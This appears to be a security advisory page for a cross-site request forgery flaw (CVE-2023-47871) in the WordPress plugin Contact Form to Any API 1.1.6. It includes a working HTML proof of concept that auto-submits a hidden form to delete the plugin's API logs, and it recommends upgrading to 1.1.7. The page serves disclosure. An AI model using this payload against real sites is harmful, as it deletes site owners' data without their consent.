Lucene search

K
packetstormArvandyPACKETSTORM:176138
HistoryDec 11, 2023 - 12:00 a.m.

WordPress Contact Form To Any API 1.1.6 Cross Site Request Forgery

2023-12-1100:00:00
Arvandy
packetstormsecurity.com
119
wordpress
contact form to any api
csrf
vulnerability
upgrade
cve-2023-47871

7.2 High

AI Score

Confidence

Low

0 Low

EPSS

Percentile

0.0%

`# Exploit Title: WP Plugins Contact Form to Any API <= 1.1.6 - CSRF  
# Date: 09-12-2023  
# Exploit Author: Arvandy  
# Software Link: https://wordpress.org/plugins/contact-form-to-any-api/  
# Vendor Homepage: https://www.itpathsolutions.com/  
# Version: 1.1.6  
# Tested on: Windows, Linux  
# CVE: CVE-2023-47871  
  
# Product Description  
Contact form 7 to Any API is most powerful plugin to send cf7 data to any third party services. It can be use to send data to CRM or any REST API. Easy to use and User friendly settings. It also Save Contact Form 7 form submitted data to the database with advanced features like search and export data to csv or excel.  
  
# Vulnerability overview  
The Wordpress plugins Contact Form to Any API <= 1.1.6 is vulnerable to Cross-Site Request Forgery in the Delete All Log function. This vulnerability could lead to unauthorized deletion of API Logs.  
  
# Proof of Concept  
<html>  
<body>  
<form action="http://x.x.x.x/WP/wp-admin/admin-ajax.php" method="POST">  
<input type="hidden" name="action" value="cf7_to_any_api_bulk_log_delete" />  
<input type="submit" value="Submit request" />  
</form>  
<script>  
history.pushState('', '', '/');  
document.forms[0].submit();  
</script>  
</body>  
</html>  
  
# Recommendation  
Upgrade to version 1.1.7  
  
`

7.2 High

AI Score

Confidence

Low

0 Low

EPSS

Percentile

0.0%

Related for PACKETSTORM:176138